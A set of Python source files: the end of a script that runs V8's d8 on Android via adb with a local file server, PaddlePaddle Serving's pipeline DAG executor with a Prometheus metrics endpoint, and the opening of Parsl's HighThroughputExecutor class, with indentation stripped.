device_d8_dir = '/data/local/tmp/v8'
root_dirs = []
arg_index = 1
while arg_index < len(sys.argv):
arg = sys.argv[arg_index]
if not arg.startswith("-"):
break
elif arg == "--":
arg_index += 1
break
elif arg == "-h" or arg == "--help":
PrintHelp(sys.stdout)
return 0
elif arg == "-v" or arg == "--verbose":
verbose = True
elif arg == "--device-dir":
arg_index += 1
device_d8_dir = sys.argv[arg_index]
elif arg.startswith("--device-dir="):
device_d8_dir = arg[len("--device-dir="):]
elif arg == "--extra-root-dir":
arg_index += 1
root_dirs.append(sys.argv[arg_index])
elif arg.startswith("--extra-root-dir="):
root_dirs.append(arg[len("--extra-root-dir="):])
else:
print("ERROR: Unrecognised option: {}".format(arg))
PrintUsage(sys.stderr)
return 1
arg_index += 1
# Transfer d8 (and dependencies) to the device.
build_dir = os.path.abspath(sys.argv[arg_index])
TransferD8ToDevice(adb, build_dir, device_d8_dir, verbose)
# Start a file server for the files d8 might need.
script_root_dir = os.path.abspath(os.curdir)
root_dirs.append(script_root_dir)
server = SocketServer.TCPServer(
("localhost", 0), # 0 means an arbitrary unused port.
CreateFileHandlerClass(root_dirs, verbose)
)
try:
# Start the file server in its own thread.
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
# Port-forward the given device port to the file server.
# TODO(leszeks): Pick an unused device port.
# TODO(leszeks): Remove the port forwarding on exit.
server_ip, server_port = server.server_address
device_port = 4444
AdbForwardDeviceToLocal(adb, device_port, server_port, verbose)
# Run d8 over adb with the remaining arguments, using the given device
# port to forward file reads.
return AdbRunD8(
adb, device_d8_dir, device_port, sys.argv[arg_index+1:], verbose)
finally:
if verbose:
print("Shutting down file server...")
server.shutdown()
server.server_close()
if __name__ == '__main__':
sys.exit(Main())
|
dag.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=doc-string-missing
import threading
import multiprocessing
import sys
import copy
if sys.version_info.major == 2:
import Queue
elif sys.version_info.major == 3:
import queue as Queue
else:
raise Exception("Error Python version")
import os
import logging
import collections
import json
from .error_catch import ErrorCatch, CustomException, CustomExceptionCode, ParamChecker, ParamVerify
from .operator import Op, RequestOp, ResponseOp, VirtualOp
from .channel import (ThreadChannel, ProcessChannel, ChannelData,
ChannelDataType, ChannelStopError)
from .error_catch import ProductErrCode
from .error_catch import CustomExceptionCode as ChannelDataErrcode
from .profiler import TimeProfiler, PerformanceTracer
from .util import NameGenerator, ThreadIdGenerator, PipelineProcSyncManager
from .proto import pipeline_service_pb2
_LOGGER = logging.getLogger(__name__)
class DAGExecutor(object):
"""
DAG Executor, the service entrance of DAG.
"""
def __init__(self, response_op, server_conf, worker_idx):
"""
Initialize DAGExecutor.
Args:
response_op: Response OP
server_conf: server conf. config.yaml
worker_idx: DAGExecutor index, PipelineServer creates many
DAGExecutors when _build_dag_each_worker is true.
Returns:
None.
"""
build_dag_each_worker = server_conf["build_dag_each_worker"]
server_worker_num = server_conf["worker_num"]
dag_conf = server_conf["dag"]
self._retry = dag_conf["retry"]
self._server_use_profile = dag_conf["use_profile"]
self._enable_prometheus = False
if "enable_prometheus" in dag_conf:
self._enable_prometheus = dag_conf["enable_prometheus"]
if "prometheus_port" in dag_conf and self._enable_prometheus:
self._prometheus_port = dag_conf["prometheus_port"]
else:
self._prometheus_port = None
channel_size = dag_conf["channel_size"]
channel_recv_frist_arrive = dag_conf["channel_recv_frist_arrive"]
self._is_thread_op = dag_conf["is_thread_op"]
tracer_conf = dag_conf["tracer"]
tracer_interval_s = tracer_conf["interval_s"]
self.name = "@DAGExecutor"
self._profiler = TimeProfiler()
self._profiler.enable(True)
self._tracer = None
if tracer_interval_s >= 1:
self._tracer = PerformanceTracer(
self._is_thread_op, tracer_interval_s, server_worker_num)
if self._enable_prometheus:
self._tracer.set_enable_dict(True)
self._dag = DAG(self.name, response_op, self._server_use_profile, self._prometheus_port,
self._is_thread_op, channel_size, build_dag_each_worker,
self._tracer, channel_recv_frist_arrive)
(in_channel, out_channel, pack_rpc_func,
unpack_rpc_func) = self._dag.build()
self._dag.start()
self._set_in_channel(in_channel)
self._set_out_channel(out_channel)
self._pack_rpc_func = pack_rpc_func
self._unpack_rpc_func = unpack_rpc_func
if self._tracer is not None:
self._tracer.start()
# generate id
# data_id: Server Unique ID, automatically generated by the framework
# log_id: Trace one product request, can be empty, not unique.
base_counter = 0
gen_id_step = 1
if build_dag_each_worker:
base_counter = worker_idx
gen_id_step = server_worker_num
self._id_generator = ThreadIdGenerator(
max_id=1000000000000000000,
base_counter=base_counter,
step=gen_id_step)
self._cv_pool = {}
self._cv_for_cv_pool = threading.Condition()
self._fetch_buffer = {}
self._recive_func = None
self._client_profile_key = "pipeline.profile"
self._client_profile_value = "1"
@ErrorCatch
def start(self):
"""
Starting one thread for receiving data from the last channel background.
Args:
None
Returns:
None
"""
self._recive_func = threading.Thread(
target=DAGExecutor._recive_out_channel_func, args=(self, ))
self._recive_func.daemon = True
self._recive_func.start()
_LOGGER.debug("[DAG Executor] Start recive thread")
def stop(self):
"""
Stopping DAG
Args:
None
Returns:
None
"""
self._dag.stop()
self._dag.join()
_LOGGER.info("[DAG Executor] Stop")
def _get_next_data_id(self):
"""
Generate data_id incrementally and Uniquely
Args:
None
Returns:
data_id: uniq id
cond_v: condition variable
"""
data_id = self._id_generator.next()
cond_v = threading.Condition()
with self._cv_for_cv_pool:
self._cv_pool[data_id] = cond_v
self._fetch_buffer[data_id] = None
return data_id, cond_v
def _set_in_channel(self, in_channel):
"""
Set in_channel of DAG
Args:
in_channel: input channel of DAG
Returns:
None
"""
if not isinstance(in_channel, (ThreadChannel, ProcessChannel)):
_LOGGER.critical("[DAG Executor] Failed to set in_channel: "
"in_channel must be Channel type, but get {}".
format(type(in_channel)))
os._exit(-1)
self._in_channel = in_channel
_LOGGER.info("[DAG] set in channel succ, name [{}]".format(self.name))
def _set_out_channel(self, out_channel):
"""
Set out_channel of DAG
Args:
out_channel: output channel of DAG
Returns:
None
"""
if not isinstance(out_channel, (ThreadChannel, ProcessChannel)):
_LOGGER.critical("[DAG Executor] Failed to set out_channel: "
"must be Channel type, but get {}".format(
type(out_channel)))
os._exit(-1)
out_channel.add_consumer(self.name)
self._out_channel = out_channel
def _recive_out_channel_func(self):
"""
Receiving data from the output channel, and pushing data into
_fetch_buffer. Function _get_channeldata_from_fetch_buffer gets
data by retry time.
Args:
None
Returns:
None
"""
cv = None
while True:
try:
channeldata_dict = self._out_channel.front(self.name)
except ChannelStopError:
_LOGGER.info("[DAG Executor] Stop.")
with self._cv_for_cv_pool:
for data_id, cv in self._cv_pool.items():
closed_errror_data = ChannelData(
error_code=ChannelDataErrcode.CLOSED_ERROR.value,
error_info="dag closed.",
data_id=data_id)
with cv:
self._fetch_buffer[data_id] = closed_errror_data
cv.notify_all()
break
if len(channeldata_dict) != 1:
_LOGGER.critical(
"[DAG Executor] Failed to fetch result: out_channel "
"cannot have multiple input ops")
os._exit(-1)
(_, channeldata), = channeldata_dict.items()
if not isinstance(channeldata, ChannelData):
_LOGGER.critical(
'[DAG Executor] Failed to fetch result: data in out_channel" \
" must be ChannelData type, but get {}'
.format(type(channeldata)))
os._exit(-1)
data_id = channeldata.id
_LOGGER.debug("(logid={}) [recive thread] Fetched data".format(
data_id))
with self._cv_for_cv_pool:
cond_v = self._cv_pool[data_id]
with cond_v:
self._fetch_buffer[data_id] = channeldata
cond_v.notify_all()
def _get_channeldata_from_fetch_buffer(self, data_id, cond_v):
"""
Getting the channel data from _fetch_buffer.
Args:
data_id: search key
cond_v: conditional variable
Returns:
ready_data: one channel data processed
"""
ready_data = None
with cond_v:
with self._cv_for_cv_pool:
if self._fetch_buffer[data_id] is not None:
# The requested data is already ready
ready_data = self._fetch_buffer[data_id]
self._cv_pool.pop(data_id)
self._fetch_buffer.pop(data_id)
if ready_data is None:
# Wait for data ready
cond_v.wait()
with self._cv_for_cv_pool:
ready_data = self._fetch_buffer[data_id]
self._cv_pool.pop(data_id)
self._fetch_buffer.pop(data_id)
_LOGGER.debug("(data_id={}) [resp thread] Got data".format(data_id))
return ready_data
def _pack_channeldata(self, rpc_request, data_id):
"""
Unpacking data from RPC request. and creating one channelData.
Args:
rpc_request: one RPC request
data_id: data id, unique
Returns:
ChannelData: one channel data to be processed
"""
dictdata = None
log_id = None
try:
dictdata, log_id, prod_errcode, prod_errinfo = self._unpack_rpc_func(
rpc_request)
except Exception as e:
_LOGGER.error(
"(logid={}) Failed to parse RPC request package: {}"
.format(data_id, e),
exc_info=True)
return ChannelData(
error_code=ChannelDataErrcode.RPC_PACKAGE_ERROR.value,
error_info="rpc package error: {}".format(e),
data_id=data_id,
log_id=log_id)
else:
# because unpack_rpc_func is rewritten by user, we need to look
# for product_errcode in returns, and client_profile_key field
# in rpc_request
if prod_errcode is not None:
# product errors occured
_LOGGER.error("unpack_rpc_func prod_errcode:{}".format(
prod_errcode))
return ChannelData(
error_code=ChannelDataErrcode.PRODUCT_ERROR.value,
error_info="",
prod_error_code=prod_errcode,
prod_error_info=prod_errinfo,
data_id=data_id,
log_id=log_id)
profile_value = None
profile_value = dictdata.get(self._client_profile_key)
client_need_profile = (profile_value == self._client_profile_value)
return ChannelData(
datatype=ChannelDataType.DICT.value,
dictdata=dictdata,
data_id=data_id,
log_id=log_id,
client_need_profile=client_need_profile)
def call(self, rpc_request):
"""
DAGExcutor enterance function. There are 5 steps:
1._get_next_data_id: Generate an incremental ID
2._pack_channeldata: pack the channel data from request.
3.retry loop:
a. push channel_data into _in_channel
b. get_channeldata_from_fetch_buffer: get results.
4._pack_for_rpc_resp: pack RPC responses
5.profile: generte profile string and pack into response.
Args:
rpc_request: one RPC request
Returns:
rpc_resp: one RPC response
"""
if self._tracer is not None:
trace_buffer = self._tracer.data_buffer()
data_id, cond_v = self._get_next_data_id()
start_call, end_call = None, None
if not self._is_thread_op:
start_call = self._profiler.record("call_{}#DAG-{}_0".format(
data_id, data_id))
else:
start_call = self._profiler.record("call_{}#DAG_0".format(data_id))
self._profiler.record("prepack_{}#{}_0".format(data_id, self.name))
req_channeldata = self._pack_channeldata(rpc_request, data_id)
self._profiler.record("prepack_{}#{}_1".format(data_id, self.name))
log_id = req_channeldata.log_id
_LOGGER.info("(data_id={} log_id={}) Succ Generate ID ".format(data_id,
log_id))
resp_channeldata = None
for i in range(self._retry):
_LOGGER.debug("(data_id={}) Pushing data into Graph engine".format(
data_id))
try:
if req_channeldata is None:
_LOGGER.critical(
"(data_id={} log_id={}) req_channeldata is None"
.format(data_id, log_id))
if not isinstance(self._in_channel,
(ThreadChannel, ProcessChannel)):
_LOGGER.critical(
"(data_id={} log_id={})[DAG Executor] Failed to "
"set in_channel: in_channel must be Channel type, but get {}".
format(data_id, log_id, type(self._in_channel)))
self._in_channel.push(req_channeldata, self.name)
except ChannelStopError:
_LOGGER.error("(data_id:{} log_id={})[DAG Executor] Stop".
format(data_id, log_id))
with self._cv_for_cv_pool:
self._cv_pool.pop(data_id)
return self._pack_for_rpc_resp(
ChannelData(
error_code=ChannelDataErrcode.CLOSED_ERROR.value,
error_info="dag closed.",
data_id=data_id))
_LOGGER.debug("(data_id={} log_id={}) Wait for Graph engine...".
format(data_id, log_id))
resp_channeldata = self._get_channeldata_from_fetch_buffer(data_id,
cond_v)
if resp_channeldata.error_code == ChannelDataErrcode.OK.value:
_LOGGER.info("(data_id={} log_id={}) Succ predict".format(
data_id, log_id))
break
else:
_LOGGER.error("(data_id={} log_id={}) Failed to predict: {}"
.format(data_id, log_id,
resp_channeldata.error_info))
if resp_channeldata.error_code != ChannelDataErrcode.TIMEOUT.value:
break
if i + 1 < self._retry:
_LOGGER.warning(
"(data_id={} log_id={}) DAGExecutor retry({}/{})"
.format(data_id, log_id, i + 1, self._retry))
_LOGGER.debug("(data_id={} log_id={}) Packing RPC response package"
.format(data_id, log_id))
self._profiler.record("postpack_{}#{}_0".format(data_id, self.name))
rpc_resp = self._pack_for_rpc_resp(resp_channeldata)
self._profiler.record("postpack_{}#{}_1".format(data_id, self.name))
if not self._is_thread_op:
end_call = self._profiler.record("call_{}#DAG-{}_1".format(data_id,
data_id))
else:
end_call = self._profiler.record("call_{}#DAG_1".format(data_id))
if self._tracer is not None:
trace_buffer.put({
"name": "DAG",
"id": data_id,
"succ":
resp_channeldata.error_code == ChannelDataErrcode.OK.value,
"actions": {
"call_{}".format(data_id): end_call - start_call,
},
})
profile_str = self._profiler.gen_profile_str()
if self._server_use_profile:
sys.stderr.write(profile_str)
# add profile info into rpc_resp
if resp_channeldata.client_need_profile:
profile_set = resp_channeldata.profile_data_set
profile_set.add(profile_str)
profile_value = "".join(list(profile_set))
rpc_resp.key.append(self._client_profile_key)
rpc_resp.value.append(profile_value)
return rpc_resp
def _pack_for_rpc_resp(self, channeldata):
"""
Packing one RPC response
Args:
channeldata: one channel data to be packed
Returns:
resp: one RPC response
"""
try:
return self._pack_rpc_func(channeldata)
except Exception as e:
_LOGGER.error(
"(logid={}) Failed to pack RPC response package: {}"
.format(channeldata.id, e),
exc_info=True)
resp = pipeline_service_pb2.Response()
resp.err_no = ChannelDataErrcode.RPC_PACKAGE_ERROR.value
resp.err_msg = "rpc package error: {}".format(e)
return resp
class DAG(object):
"""
Directed Acyclic Graph(DAG) engine, builds one DAG topology.
"""
def __init__(self, request_name, response_op, use_profile, prometheus_port, is_thread_op,
channel_size, build_dag_each_worker, tracer,
channel_recv_frist_arrive):
_LOGGER.info("{}, {}, {}, {}, {}, {} ,{} ,{} ,{}".format(request_name, response_op, use_profile, prometheus_port, is_thread_op,
channel_size, build_dag_each_worker, tracer,
channel_recv_frist_arrive))
@ErrorCatch
@ParamChecker
def init_helper(self, request_name: str,
response_op,
use_profile: [bool, None],
prometheus_port: [int, None],
is_thread_op: bool,
channel_size,
build_dag_each_worker: [bool, None],
tracer,
channel_recv_frist_arrive):
self._request_name = request_name
self._response_op = response_op
self._use_profile = use_profile
self._prometheus_port = prometheus_port
self._use_prometheus = (self._prometheus_port is not None)
self._is_thread_op = is_thread_op
self._channel_size = channel_size
self._build_dag_each_worker = build_dag_each_worker
self._tracer = tracer
self._channel_recv_frist_arrive = channel_recv_frist_arrive
if not self._is_thread_op:
self._manager = PipelineProcSyncManager()
init_helper(self, request_name, response_op, use_profile, prometheus_port, is_thread_op,
channel_size, build_dag_each_worker, tracer,
channel_recv_frist_arrive)
print("[DAG] Succ init")
_LOGGER.info("[DAG] Succ init")
@staticmethod
def get_use_ops(response_op):
"""
Starting from ResponseOp, recursively traverse the front OPs. Getting
all used ops and the post op list of each op (excluding ResponseOp)
Args:
response_op: ResponseOp
Returns:
used_ops: used ops, set
succ_ops_of_use_op: op and the next op list, dict.
"""
unique_names = set()
used_ops = set()
succ_ops_of_use_op = {} # {op_name: succ_ops}
que = Queue.Queue()
que.put(response_op)
while que.qsize() != 0:
op = que.get()
for pred_op in op.get_input_ops():
if pred_op.name not in succ_ops_of_use_op:
succ_ops_of_use_op[pred_op.name] = []
if op != response_op:
succ_ops_of_use_op[pred_op.name].append(op)
if pred_op not in used_ops:
que.put(pred_op)
used_ops.add(pred_op)
# check the name of op is globally unique
if pred_op.name in unique_names:
_LOGGER.critical("Failed to get used Ops: the"
" name of Op must be unique: {}".
format(pred_op.name))
os._exit(-1)
unique_names.add(pred_op.name)
return used_ops, succ_ops_of_use_op
def _gen_channel(self, name_gen):
"""
Generate one ThreadChannel or ProcessChannel.
Args:
name_gen: channel name
Returns:
channel: one channel generated
"""
channel = None
if self._is_thread_op:
channel = ThreadChannel(
name=name_gen.next(),
maxsize=self._channel_size,
channel_recv_frist_arrive=self._channel_recv_frist_arrive)
else:
channel = ProcessChannel(
self._manager,
name=name_gen.next(),
maxsize=self._channel_size,
channel_recv_frist_arrive=self._channel_recv_frist_arrive)
_LOGGER.debug("[DAG] Generate channel: {}".format(channel.name))
return channel
def _gen_virtual_op(self, name_gen):
"""
Generate one virtual Op
Args:
name_gen: Op name
Returns:
vir_op: one virtual Op object.
"""
vir_op = VirtualOp(name=name_gen.next())
_LOGGER.debug("[DAG] Generate virtual_op: {}".format(vir_op.name))
return vir_op
def _topo_sort(self, used_ops, response_op, out_degree_ops):
"""
Topological sort of DAG, creates inverted multi-layers views.
Args:
used_ops: op used in DAG
response_op: response op
out_degree_ops: Next op list for each op, dict. the output of
get_use_ops()
Returns:
dag_views: the inverted hierarchical topology list. examples:
DAG :[A -> B -> C -> E]
\-> D /
dag_views: [[E], [C, D], [B], [A]]
last_op:the last op front of ResponseOp
"""
out_degree_num = {
name: len(ops)
for name, ops in out_degree_ops.items()
}
que_idx = 0 # scroll queue
ques = [Queue.Queue() for _ in range(2)]
zero_indegree_num = 0
for op in used_ops:
if len(op.get_input_ops()) == 0:
zero_indegree_num += 1
if zero_indegree_num != 1:
_LOGGER.critical("Failed to topo sort: DAG contains "
"multiple RequestOps")
os._exit(-1)
last_op = response_op.get_input_ops()[0]
ques[que_idx].put(last_op)
# topo sort to get dag_views
dag_views = []
sorted_op_num = 0
while True:
que = ques[que_idx]
next_que = ques[(que_idx + 1) % 2]
dag_view = []
while que.qsize() != 0:
op = que.get()
dag_view.append(op)
sorted_op_num += 1
for pred_op in op.get_input_ops():
out_degree_num[pred_op.name] -= 1
if out_degree_num[pred_op.name] == 0:
next_que.put(pred_op)
dag_views.append(dag_view)
if next_que.qsize() == 0:
break
que_idx = (que_idx + 1) % 2
if sorted_op_num < len(used_ops):
_LOGGER.critical("Failed to topo sort: not legal DAG")
os._exit(-1)
return dag_views, last_op
def _build_dag(self, response_op):
"""
Building DAG, the most important function in class DAG. Core steps:
1.get_use_ops: Getting used ops, and out degree op list for each op.
2._topo_sort: Topological sort creates inverted multi-layers views.
3.create channels and virtual ops.
Args:
response_op: ResponseOp
Returns:
actual_ops: all OPs used in DAG, including virtual OPs
channels: all channels used in DAG
input_channel: the channel of first OP
output_channel: the channel of last OP
pack_func: pack_response_package function of response_op
unpack_func: unpack_request_package function of request_op
"""
if response_op is None:
_LOGGER.critical("Failed to build DAG: ResponseOp"
" has not been set.")
os._exit(-1)
used_ops, out_degree_ops = DAG.get_use_ops(response_op)
if not self._build_dag_each_worker:
_LOGGER.info("================= USED OP =================")
for op in used_ops:
if not isinstance(op, RequestOp):
_LOGGER.info(op.name)
_LOGGER.info("-------------------------------------------")
if len(used_ops) <= 1:
_LOGGER.critical(
"Failed to build DAG: besides RequestOp and ResponseOp, "
"there should be at least one Op in DAG.")
os._exit(-1)
if self._build_dag_each_worker:
_LOGGER.info("Because `build_dag_each_worker` mode is used, "
"Auto-batching is set to the default config: "
"batch_size=1, auto_batching_timeout=None")
for op in used_ops:
op.use_default_auto_batching_config()
dag_views, last_op = self._topo_sort(used_ops, response_op,
out_degree_ops)
dag_views = list(reversed(dag_views))
if not self._build_dag_each_worker:
_LOGGER.info("================== DAG ====================")
for idx, view in enumerate(dag_views):
_LOGGER.info("(VIEW {})".format(idx))
for op in view:
_LOGGER.info(" [{}]".format(op.name))
for out_op in out_degree_ops[op.name]:
_LOGGER.info(" - {}".format(out_op.name))
_LOGGER.info("-------------------------------------------")
# create channels and virtual ops
virtual_op_name_gen = NameGenerator("vir")
channel_name_gen = NameGenerator("chl")
virtual_ops = []
channels = []
input_channel = None
actual_view = None
for v_idx, view in enumerate(dag_views):
if v_idx + 1 >= len(dag_views):
break
next_view = dag_views[v_idx + 1]
if actual_view is None:
actual_view = view
actual_next_view = []
pred_op_of_next_view_op = {}
for op in actual_view:
# find actual succ op in next view and create virtual op
for succ_op in out_degree_ops[op.name]:
if succ_op in next_view:
if succ_op not in actual_next_view:
actual_next_view.append(succ_op)
if succ_op.name not in pred_op_of_next_view_op:
pred_op_of_next_view_op[succ_op.name] = []
pred_op_of_next_view_op[succ_op.name].append(op)
else:
# create virtual op
virtual_op = self._gen_virtual_op(virtual_op_name_gen)
virtual_ops.append(virtual_op)
out_degree_ops[virtual_op.name] = [succ_op]
actual_next_view.append(virtual_op)
pred_op_of_next_view_op[virtual_op.name] = [op]
virtual_op.add_virtual_pred_op(op)
actual_view = actual_next_view
# create channel
processed_op = set()
for o_idx, op in enumerate(actual_next_view):
if op.name in processed_op:
continue
channel = self._gen_channel(channel_name_gen)
channels.append(channel)
op.add_input_channel(channel)
_LOGGER.info("op:{} add input channel.".format(op.name))
pred_ops = pred_op_of_next_view_op[op.name]
if v_idx == 0:
input_channel = channel
else:
# if pred_op is virtual op, it will use ancestors as producers to channel
for pred_op in pred_ops:
pred_op.add_output_channel(channel)
_LOGGER.info("pred_op:{} add output channel".format(
pred_op.name))
processed_op.add(op.name)
# find same input op to combine channel
for other_op in actual_next_view[o_idx + 1:]:
if other_op.name in processed_op:
continue
other_pred_ops = pred_op_of_next_view_op[other_op.name]
if len(other_pred_ops) != len(pred_ops):
continue
same_flag = True
for pred_op in pred_ops:
if pred_op not in other_pred_ops:
same_flag = False
break
if same_flag:
other_op.add_input_channel(channel)
processed_op.add(other_op.name)
output_channel = self._gen_channel(channel_name_gen)
channels.append(output_channel)
last_op.add_output_channel(output_channel)
_LOGGER.info("last op:{} add output channel".format(last_op.name))
pack_func, unpack_func = None, None
pack_func = response_op.pack_response_package
actual_ops = virtual_ops
for op in used_ops:
if len(op.get_input_ops()) == 0:
#set special features of the request op.
#1.set unpack function.
#2.set output channel.
unpack_func = op.unpack_request_package
op.add_output_channel(input_channel)
continue
actual_ops.append(op)
for c in channels:
_LOGGER.debug("Channel({}):\n\t- producers: {}\n\t- consumers: {}"
.format(c.name, c.get_producers(), c.get_consumers()))
return (actual_ops, channels, input_channel, output_channel, pack_func,
unpack_func)
def get_channels(self):
return self._channels
def build(self):
"""
Interface for building one DAG outside.
Args:
None
Returns:
_input_channel: the channel of first OP
_output_channel: the channel of last OP
_pack_func: pack_response_package function of response_op
_unpack_func: unpack_request_package function of request_op
"""
(actual_ops, channels, input_channel, output_channel, pack_func,
unpack_func) = self._build_dag(self._response_op)
_LOGGER.info("[DAG] Succ build DAG")
self._actual_ops = actual_ops
self._channels = channels
self._input_channel = input_channel
self._output_channel = output_channel
self._pack_func = pack_func
self._unpack_func = unpack_func
if self._tracer is not None:
self._tracer.set_channels(self._channels)
return self._input_channel, self._output_channel, self._pack_func, self._unpack_func
def start_prom(self, prometheus_port):
import prometheus_client
from prometheus_client import Counter
from prometheus_client.core import CollectorRegistry
from flask import Response, Flask
from .prometheus_metrics import registry
from .prometheus_metrics import metric_query_success, metric_query_failure, metric_inf_count, metric_query_duration_us, metric_inf_duration_us
app = Flask(__name__)
# requests_total = Counter('c1','A counter')
@app.route("/metrics")
def requests_count():
item = self._tracer.profile_dict
_LOGGER.info("metrics: {}".format(item))
# {'uci': {'in': 727.443, 'prep': 0.5525833333333333, 'midp': 2.21375, 'postp': 1.32375, 'out': 0.9396666666666667}, 'DAG': {'call_0': 29.479, 'call_1': 8.176, 'call_2': 8.045, 'call_3': 7.988, 'call_4': 7.609, 'call_5': 7.629, 'call_6': 7.625, 'call_7': 8.32, 'call_8': 8.57, 'call_9': 8.055, 'call_10': 7.915, 'call_11': 7.873, 'query_count': 12, 'qps': 1.2, 'succ': 1.0, 'avg': 9.773666666666667, '50': 8.045, '60': 8.055, '70': 8.176, '80': 8.32, '90': 8.57, '95': 29.479, '99': 29.479}}
if "DAG" in item:
total = item["DAG"]["query_count"]
succ = total * item["DAG"]["succ"]
fail = total * (1 - item["DAG"]["succ"])
query_duration = total *item["DAG"]["avg"]
metric_query_success.inc(succ)
metric_query_failure._value.inc(fail)
metric_query_duration_us._value.inc(query_duration)
inf_cnt = 0
infer_duration = 0.0
for name in item:
if name != "DAG":
if "count" in item[name]:
inf_cnt += item[name]["count"]
if "midp" in item[name]:
infer_duration += item[name]["count"]*item[name]["midp"]
metric_inf_count._value.inc(inf_cnt)
metric_inf_duration_us._value.inc(infer_duration)
#return str(item)
self._tracer.profile_dict = {}
return Response(prometheus_client.generate_latest(registry),mimetype="text/plain")
def prom_run():
app.run(host="0.0.0.0",port=prometheus_port)
p = threading.Thread(
target=prom_run,
args=())
_LOGGER.info("Prometheus Start 2")
p.daemon = True
p.start()
def start(self):
"""
Each OP starts a thread or process by _is_thread_op
Args:
None
Returns:
_threads_or_proces: threads or process list.
"""
self._threads_or_proces = []
for op in self._actual_ops:
op.use_profiler(self._use_profile)
op.set_tracer(self._tracer)
op.set_use_prometheus(self._use_prometheus)
if self._is_thread_op:
self._threads_or_proces.extend(op.start_with_thread())
else:
self._threads_or_proces.extend(op.start_with_process())
_LOGGER.info("[DAG] start")
if self._use_prometheus:
_LOGGER.info("Prometheus Start 1")
self.start_prom(self._prometheus_port)
# not join yet
return self._threads_or_proces
def join(self):
"""
All threads or processes join.
Args:
None
Returns:
None
"""
for x in self._threads_or_proces:
if x is not None:
x.join()
def stop(self):
"""
Stopping and cleanning all channels.
Args:
None
Returns:
None
"""
for chl in self._channels:
chl.stop()
for op in self._actual_ops:
op.clean_input_channel()
op.clean_output_channels()
|
executor.py
|
"""HighThroughputExecutor builds on the Swift/T EMEWS architecture to use MPI for fast task distribution
"""
from concurrent.futures import Future
import logging
import threading
import queue
import pickle
from multiprocessing import Process, Queue
from ipyparallel.serialize import pack_apply_message # ,unpack_apply_message
from ipyparallel.serialize import deserialize_object # ,serialize_object
from parsl.executors.high_throughput import zmq_pipes
from parsl.executors.high_throughput import interchange
from parsl.executors.errors import *
from parsl.executors.base import ParslExecutor
from parsl.dataflow.error import ConfigurationError
from parsl.utils import RepresentationMixin
from parsl.providers import LocalProvider
logger = logging.getLogger(__name__)
BUFFER_THRESHOLD = 1024 * 1024
ITEM_THRESHOLD = 1024
class HighThroughputExecutor(ParslExecutor, RepresentationMixin):
"""Executor designed for cluster-scale
The HighThroughputExecutor system has the following components:
1. The HighThroughputExecutor instance which is run as part of the Parsl script.
2. The Interchange which is acts as a load-balancing proxy between workers and Parsl
3. The multiprocessing based worker pool which coordinates task execution over several
cores on a node.
4. ZeroMQ pipes connect the HighThroughputExecutor, Interchange and the process_worker_pool
Here is a diagram
.. code:: python
| Data | Executor | Interchange | External Process(es)
| Flow | | |
Task | Kernel | | |
+----->|-------->|------------>|->outgoing_q---|-> process_worker_pool
| | | | batching | | |
Parsl<---Fut-| | | load-balancing| result exception
^ | | | watchdogs | | |
| | | Q_mngmnt | | V V
| | | Thread<--|-incoming_q<---|--- +---------+
| | | | | |
| | | | | |
+----update_fut-----+
Parameters
----------
provider : :class:`~parsl.providers.provider_base.ExecutionProvider`
Provider to access computation resources. Can be one of :class:`~parsl.providers.aws.aws.EC2Provider`,
:class:`~parsl.providers.cobalt.cobalt.Cobalt`,
:class:`~parsl.providers.condor.condor.Condor`,
:class:`~parsl.providers.googlecloud.googlecloud.GoogleCloud`,
:class:`~parsl.providers.gridEngine.gridEngine.GridEngine`,
:class:`~parsl.providers.jetstream.jetstream.Jetstream`,
:class:`~parsl.providers.local.local.Local`,
:class:`~parsl.providers.sge.sge.GridEngine`,
:class:`~parsl.providers.slurm.slurm.Slurm`, or
:class:`~parsl.providers.torque.torque.Torque`.
label : str
Label for this executor instance.
launch_cmd : str
Command line string to launch the process_worker_pool from the provider. The command line string
will be formatted with appropriate values for the following values (debug, task_url, result_url,
cores_per_worker, nodes_per_block, heartbeat_period ,heartbeat_threshold, logdir). For eg:
launch_cmd="process_worker_pool.py {debug} -c {cores_per_worker} --task_url={task_url} --result_url={result_url}"
address : string
An address to connect to the main Parsl process which is reachable from the network in which
workers will be running. This can be either a hostname as returned by `hostname` or an
IP address. Most login nodes on clusters have several network interfaces available, only
some of which can be reached from the compute nodes. Some trial and error might be
necessary to indentify what addresses are reachable from compute nodes.
worker_ports : (int, int)
Specify the ports to be used by workers to connect to Parsl. If this option is specified,
worker_port_range will not be honored.
worker_port_range : (int, int)
Worker ports will be chosen between the two integers provided.
interchange_port_range : (int, int)
Port range used by Parsl to communicate with the Interchange.
working_dir : str
Working dir to be used by the executor.
worker_debug : Bool
Enables worker debug logging.
managed : Bool
If this executor is managed by the DFK or externally handled.
cores_per_worker : float
cores to be assigned to each worker. Oversubscription is possible
by setting cores_per_worker < 1.0. Default=1
max_workers : int
Caps the number of workers launched by the manager. Default: infinity
suppress_failure : Bool
If set, the interchange will suppress failures rather than terminate early. Default: False
heartbeat_threshold : int
Seconds since the last message from the counterpart in the communication pair:
(interchange, manager) after which the counterpart is assumed to be un-available. Default:120s
heartbeat_period : int
Number of seconds after which a heartbeat message indicating liveness is sent to the
counterpart (interchange, manager). Default:30s
"""
def __init__(self,
label='HighThroughputExecutor',
provider=LocalProvider(),
launch_cmd=None,
address="127.0.0.1",
worker_ports=None,
worker_port_range=(54000, 55000),
interchange_port_range=(55000, 56000),
storage_access=None,
working_dir=None,
worker_debug=False,
cores_per_worker=1.0,
max_workers=float('inf'),
heartbeat_threshold=120,
heartbeat_period=30,
suppress_failure=False,
managed=True):
logger.debug("Initializing HighThroughputExecutor")
self.label = label
self.launch_cmd = launch_cmd
self.provider = provider
self.worker_debug = worker_debug
self.storage_access = storage_access if storage_access is not None else []
if len(self.storage_access) > 1:
raise ConfigurationError('Multiple storage access schemes are not supported')
self.working_dir = working_dir
self.managed = managed
self.blocks = []
self.tasks = {}
self.cores_per_worker = cores_per_worker
self.max_workers = max_workers
self._task_counter = 0
self.address = address
self.worker_ports = worker_ports
